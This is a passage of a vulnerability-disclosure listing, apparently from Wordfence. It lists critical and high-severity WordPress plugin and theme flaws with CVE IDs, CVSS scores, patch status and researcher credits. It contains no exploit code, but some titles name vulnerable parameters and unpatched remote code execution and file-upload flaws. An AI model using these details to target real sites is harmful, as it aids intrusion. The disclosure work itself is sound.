<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-responsive-video-embedder" target="_blank" rel="noopener">Advanced Responsive Video Embedder for Rumble, Odysee, YouTube, Vimeo, Kick …</a> <span class="wfvr-software-slug">[advanced-responsive-video-embedder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/70f64ea0-5375-479f-90ac-29bcdf817cef" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fea82b46-cb23-4603-8e50-565cc65db857" target="_blank" rel="noopener">AI Copilot – Content Generator &lt;= 1.5.6 &#8211; Unauthenticated Privilege Escalation</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65507" target="_blank" rel="noopener noreferrer">							CVE-2026-65507						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ai-copilot-content-generator" target="_blank" rel="noopener">AI Copilot – Content Generator</a> <span class="wfvr-software-slug">[ai-copilot-content-generator]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/qdtad" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ae8de8c9cbdc17ec01dd57c487e7cd37.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ae8de8c9cbdc17ec01dd57c487e7cd37"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/qdtad" target="_blank" rel="noopener">qdtad</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fea82b46-cb23-4603-8e50-565cc65db857" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4c8f2872-06ff-41a2-b601-77a47470de0c" target="_blank" rel="noopener">Cost Calculator Builder PRO &lt;= 4.0.3 &#8211; Unauthenticated Remote Code Execution via &#8216;orderDetails&#8217; Parameter</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14900" target="_blank" rel="noopener noreferrer">							CVE-2026-14900						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cost-calculator-builder-pro" target="_blank" rel="noopener">Cost Calculator Builder PRO</a> <span class="wfvr-software-slug">[cost-calculator-builder-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nox-axter" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4efd64e53b1a31312046abedbc413318.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4efd64e53b1a31312046abedbc413318"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nox-axter" target="_blank" rel="noopener">Nox Axter</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4c8f2872-06ff-41a2-b601-77a47470de0c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/23068a98-623d-4eb3-a7c5-6af410de4320" target="_blank" rel="noopener">Realtyna Organic IDX plugin + WPL Real Estate &lt;= 5.2.0 &#8211; Unauthenticated Arbitrary File Upload via &#8216;files[file]&#8217; Parameter via Public I/O &#8216;set_property&#8217; Command</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14483" target="_blank" rel="noopener noreferrer">							CVE-2026-14483						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/real-estate-listing-realtyna-wpl" target="_blank" rel="noopener">Realtyna Organic IDX plugin + WPL Real Estate</a> <span class="wfvr-software-slug">[real-estate-listing-realtyna-wpl]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/khaled-alenazi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8b3f0797781c7ba63352fd9b82ef63a9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8b3f0797781c7ba63352fd9b82ef63a9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/khaled-alenazi" target="_blank" rel="noopener">Khaled Alenazi (Nxploited)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/23068a98-623d-4eb3-a7c5-6af410de4320" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1d8d393e-764c-491d-8afb-7d4f8d0c387a" target="_blank" rel="noopener">Single Sign On For TNG &lt;= 2.0.0 &#8211; Unauthenticated Privilege Escalation via Unverified Password Change</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15964" target="_blank" rel="noopener noreferrer">							CVE-2026-15964						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/single-sign-on-for-tng" target="_blank" rel="noopener">Single Sign On For TNG</a> <span class="wfvr-software-slug">[single-sign-on-for-tng]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/andrea-bocchetti" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8dae08eb7d527264fd4e9c97ea820971.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8dae08eb7d527264fd4e9c97ea820971"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/andrea-bocchetti" target="_blank" rel="noopener">andrea bocchetti</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1d8d393e-764c-491d-8afb-7d4f8d0c387a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/661d4ea9-572d-4544-b5cf-39fd69c104a6" target="_blank" rel="noopener">SMS Alert &lt;= 3.9.7 &#8211; Unauthenticated Authentication Bypass to Account Takeover via &#8216;billing_phone&#8217; Parameter</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15014" target="_blank" rel="noopener noreferrer">							CVE-2026-15014						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sms-alert" target="_blank" rel="noopener">SMS Alert – SMS &amp; OTP for WooCommerce, Order Notifications &amp; Abandoned Cart Recovery</a> <span class="wfvr-software-slug">[sms-alert]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/civitasmass" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/848ff46b2a1d687cc8e2670b302e1548.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="848ff46b2a1d687cc8e2670b302e1548"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/civitasmass" target="_blank" rel="noopener">Civitasmass</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/661d4ea9-572d-4544-b5cf-39fd69c104a6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d10672ba-ae98-43e8-9ad8-2b12e2b7bc49" target="_blank" rel="noopener">Spider Analyser – WordPress搜索引擎蜘蛛分析插件 &lt;= 2.1.3 &#8211; Unauthenticated Remote Code Execution</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65553" target="_blank" rel="noopener noreferrer">							CVE-2026-65553						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/spider-analyser" target="_blank" rel="noopener">Spider Analyser – WordPress搜索引擎蜘蛛分析插件</a> <span class="wfvr-software-slug">[spider-analyser]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d10672ba-ae98-43e8-9ad8-2b12e2b7bc49" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1f891b68-72c4-4f94-bd49-52576ad710f9" target="_blank" rel="noopener">Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light &lt;= 2.4.37 &#8211; Missing Authorization to Unauthenticated Privilege Escalation via Admin Account Creation</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2025-10656" target="_blank" rel="noopener noreferrer">							CVE-2025-10656						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/excel-like-price-change-for-woocommerce-and-wp-e-commerce-light" target="_blank" rel="noopener">Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light</a> <span class="wfvr-software-slug">[excel-like-price-change-for-woocommerce-and-wp-e-commerce-light]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kr0d" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e97952602dfd17f0532ab6202b1dd0db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e97952602dfd17f0532ab6202b1dd0db"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kr0d" target="_blank" rel="noopener">kr0d</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1f891b68-72c4-4f94-bd49-52576ad710f9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/53e83037-2cc5-4dc9-b55d-03829df12a65" target="_blank" rel="noopener">WooCommerce &#8211; Social Login &lt;= 2.8.7 &#8211; Unauthenticated Authentication Bypass via Forged Apple &#8216;id_token&#8217; JWT</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-8457" target="_blank" rel="noopener noreferrer">							CVE-2026-8457						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 1, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-social-login" target="_blank" rel="noopener">WooCommerce &#8211; Social Login</a> <span class="wfvr-software-slug">[woo-social-login]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/bdcb43576544351fa89720015a32ba9b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bdcb43576544351fa89720015a32ba9b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener">Rafie Muhammad</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/53e83037-2cc5-4dc9-b55d-03829df12a65" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/63922c28-0cb5-4abe-85ee-20b2cc6f015d" target="_blank" rel="noopener">Demi &lt;= 0.0.6 &#8211; Unauthenticated Arbitrary Directory Deletion via demi_restore_step AJAX action</a></h4>
<div class="cvss-score-badge">9.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.1 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14490" target="_blank" rel="noopener noreferrer">							CVE-2026-14490						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/demi-backup-migration" target="_blank" rel="noopener">Demi – One Click Demo Import, Backup &amp; Site Migration</a> <span class="wfvr-software-slug">[demi-backup-migration]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nasur-ullah-spy0x7" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f7a401ff0c9706d16cdb8dd3bdf72a6b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f7a401ff0c9706d16cdb8dd3bdf72a6b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nasur-ullah-spy0x7" target="_blank" rel="noopener">Spy0x7</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/63922c28-0cb5-4abe-85ee-20b2cc6f015d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/097a9d0f-fa38-4fdc-9048-43dd65e7652c" target="_blank" rel="noopener">FormGent &lt;= 1.9.2- Missing Authorization to Unauthenticated Arbitrary File Deletion via &#8216;file_token&#8217; Parameter</a></h4>
<div class="cvss-score-badge">9.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.1 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-3141" target="_blank" rel="noopener noreferrer">							CVE-2026-3141						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/formgent" target="_blank" rel="noopener">FormGent – Next-Gen AI Form Builder for WordPress with Multi-Step, Quizzes, Payments &amp; More</a> <span class="wfvr-software-slug">[formgent]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c0d3936ce2491c1bd33db966cf5421b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c0d3936ce2491c1bd33db966cf5421b9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener">Athiwat Tiprasaharn (Jitlada)</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/itthidej-aramsri" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/048e7871de77533583773e0172b337bc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="048e7871de77533583773e0172b337bc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/itthidej-aramsri" target="_blank" rel="noopener">Itthidej Aramsri (Boeing777)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/097a9d0f-fa38-4fdc-9048-43dd65e7652c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e9506f84-3d33-48e0-8dce-d517e1a923e4" target="_blank" rel="noopener">Meta Box AIO &lt;= 3.8.0 &#8211; Missing Authorization to Unauthenticated Arbitrary Post Deletion via &#8216;rwmb_frontend_field_object_id&#8217; Parameter</a></h4>
<div class="cvss-score-badge">9.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.1 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14488" target="_blank" rel="noopener noreferrer">							CVE-2026-14488						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/meta-box-aio" target="_blank" rel="noopener">Meta Box AIO</a> <span class="wfvr-software-slug">[meta-box-aio]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/austin-ginder" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4ecc8b71d0984f421844d12e862a7638.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4ecc8b71d0984f421844d12e862a7638"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/austin-ginder" target="_blank" rel="noopener">Austin Ginder</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e9506f84-3d33-48e0-8dce-d517e1a923e4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/45816c45-42bc-4163-b700-a1e913f32c97" target="_blank" rel="noopener">AI Engine &lt;= 3.6.5 &#8211; Cross-Site Request Forgery to Privilege Escalation via REQUEST_URI Substring Match</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15988" target="_blank" rel="noopener noreferrer">							CVE-2026-15988						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ai-engine" target="_blank" rel="noopener">AI Engine – The Chatbot, AI Framework &amp; MCP for WordPress</a> <span class="wfvr-software-slug">[ai-engine]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/uko-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5a50351dc3a5975487697a55ad3936d5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5a50351dc3a5975487697a55ad3936d5"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/uko-2" target="_blank" rel="noopener">UKO</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/45816c45-42bc-4163-b700-a1e913f32c97" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/390a541e-68dd-43dd-8fe4-5334c534552c" target="_blank" rel="noopener">Betheme &lt;= 28.4.2 &#8211; Authenticated (Contributor+) Remote Code Execution</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65548" target="_blank" rel="noopener noreferrer">							CVE-2026-65548						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/betheme" target="_blank" rel="noopener">Betheme</a> <span class="wfvr-software-slug">[betheme]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/390a541e-68dd-43dd-8fe4-5334c534552c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
